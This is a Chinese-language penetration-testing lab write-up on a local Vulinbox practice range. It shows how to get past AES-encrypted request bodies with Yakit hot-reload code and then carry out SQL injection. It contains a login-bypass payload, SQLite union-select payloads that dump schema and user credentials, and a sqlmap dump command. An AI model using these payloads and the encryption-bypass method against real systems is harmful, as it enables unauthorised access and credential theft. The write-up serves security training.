渗透测试-前后端加密分析之AES加密下的SQL注入
本文是高级前端加解密与验签实战的第9篇文章,也是最后一篇文章。本系列文章实验靶场为Yakit里自带的Vulinbox靶场,本文讲述的是绕过前后端加密进行SQL注入。
登录
输入账号密码,抓包查看数据包,看上去就是一个普通的aes加密:
这里热加载代码不算太难,常规的加解密函数就可以了:
encryptAES = (packet) => {
body = poc.GetHTTPPacketBody(packet)
// 生成随机key和iv
key = randstr(16)
iv = randstr(12)
// 加密数据
data = codec.AESCBCEncrypt(key /*type: []byte*/, body, iv /*type: []byte*/)~
data = codec.EncodeBase64(data)
// 获取key和iv的hex值
hexKey = codec.EncodeToHex(key)
hexIV = codec.EncodeToHex(iv)
// 构造新的body
body = f`{"key": "${hexKey}","iv": "${hexIV}","message": "${data}"}`
return poc.ReplaceBody(packet, body, false)
}
decryptAES = (packet) => {
body = poc.GetHTTPPacketBody(packet)
body = json.loads(body)
key = codec.DecodeHex(body.key)~
iv = codec.DecodeHex(body.iv)~
data = codec.DecodeBase64(body.message)~
data = codec.AESCBCDecrypt(key, data, iv)~
return poc.ReplaceBody(packet, data, false)
}
beforeRequest = func(req){
return encryptAES(req)
}
afterRequest = func(rsp){
return decryptAES(rsp)
}
请求体格式
{"username":"admin","password":"password"}
热加载加解密成功
本关提示是SQL注入,所以直接啪一个1=1,说时迟那时快,直接登陆成功
POST /crypto/sqli/aes-ecb/encrypt/login HTTP/1.1
Host: 127.0.0.1:8787
Content-Type: application/json
{"username":"admin","password":"password'or 1=1--"}
注入
手工
登陆后看到请求了/crypto/sqli/aes-ecb/encrypt/query/users
路径
解密一下请求包:
获取到请求的格式:
{"search":""}
这里是SQLite注入,注入的语句是通过这篇文章获取的:sqlite注入的一点总结 - 先知社区 (aliyun.com)
{"search":"user1'order by 3--"}
{"search":"user1'union select 1,2,3--"}
{"search":"user1'union select 11,22,sql from sqlite_master--"}
{"search":"user1'union select 11,22,sql from sqlite_master where type='table' and name='vulin_users'--"}
{"search":"user1'union select username,password,id from vulin_users--"}
注入成功:
POST /crypto/sqli/aes-ecb/encrypt/query/users HTTP/1.1
Host: 127.0.0.1:8787
Cookie: token=PLNqoZMZfiELLLFuTbmOtSrDdnpFmDDM
Content-Type: application/json
Content-Length: 119
{"search":"user1'union select username,password,id from vulin_users--"}
sqlmap
在MITM处加载热加载代码
使用sqlmap注入
python .\sqlmap.py -r .\http.txt --proxy=http://127.0.0.1:8081 --batch -dbms=sqlite -T vulin_users -C username,password,role --dump
http.txt
POST /crypto/sqli/aes-ecb/encrypt/query/users HTTP/1.1
Host: 127.0.0.1:8787
Cookie: token=PLNqoZMZfiELLLFuTbmOtSrDdnpFmDDM
Content-Type: application/json
Content-Length: 119
{"search":"*"}
效果: